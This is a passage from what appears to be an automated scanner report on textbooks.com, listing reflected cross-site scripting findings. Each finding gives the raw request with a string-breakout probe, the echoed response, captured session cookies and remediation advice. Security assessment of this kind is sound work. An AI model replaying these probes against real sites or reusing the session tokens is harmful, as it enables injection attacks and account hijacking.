Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3632
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:20 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-FAQ.php50160';c1fcfb98d9a'

</script>
...[SNIP]...

1.40. http://www.textbooks.com/CustServ-Home.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Home.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dacf6'%3b11fef22db6a was submitted in the REST URL parameter 1. This input was echoed as dacf6';11fef22db6a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Home.phpdacf6'%3b11fef22db6a HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Home.phpdacf6';11fef22db6a'

</script>
...[SNIP]...

1.41. http://www.textbooks.com/CustServ-HowToShop.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-HowToShop.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ea9b'%3ba03b8f867cb was submitted in the REST URL parameter 1. This input was echoed as 7ea9b';a03b8f867cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-HowToShop.php7ea9b'%3ba03b8f867cb HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3638
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:35 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
bj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-HowToShop.php7ea9b';a03b8f867cb'

</script>
...[SNIP]...

1.42. http://www.textbooks.com/CustServ-Privacy.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Privacy.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e83e'%3b607330bdcaa was submitted in the REST URL parameter 1. This input was echoed as 9e83e';607330bdcaa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Privacy.php9e83e'%3b607330bdcaa HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:33 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Privacy.php9e83e';607330bdcaa'

</script>
...[SNIP]...

1.43. http://www.textbooks.com/CustServ-ShippingPolicy.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-ShippingPolicy.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82861'%3b50f147614bc was submitted in the REST URL parameter 1. This input was echoed as 82861';50f147614bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-ShippingPolicy.php82861'%3b50f147614bc HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3643
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:18 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-ShippingPolicy.php82861';50f147614bc'

</script>
...[SNIP]...

1.44. http://www.textbooks.com/CustServ-Terms.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Terms.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f540'%3bfe05e082287 was submitted in the REST URL parameter 1. This input was echoed as 6f540';fe05e082287 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Terms.php6f540'%3bfe05e082287 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:35 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Terms.php6f540';fe05e082287'

</script>
...[SNIP]...

1.45. http://www.textbooks.com/CustServ-WhyTB.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-WhyTB.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f32f'%3bba57205973 was submitted in the REST URL parameter 1. This input was echoed as 8f32f';ba57205973 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-WhyTB.php8f32f'%3bba57205973 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
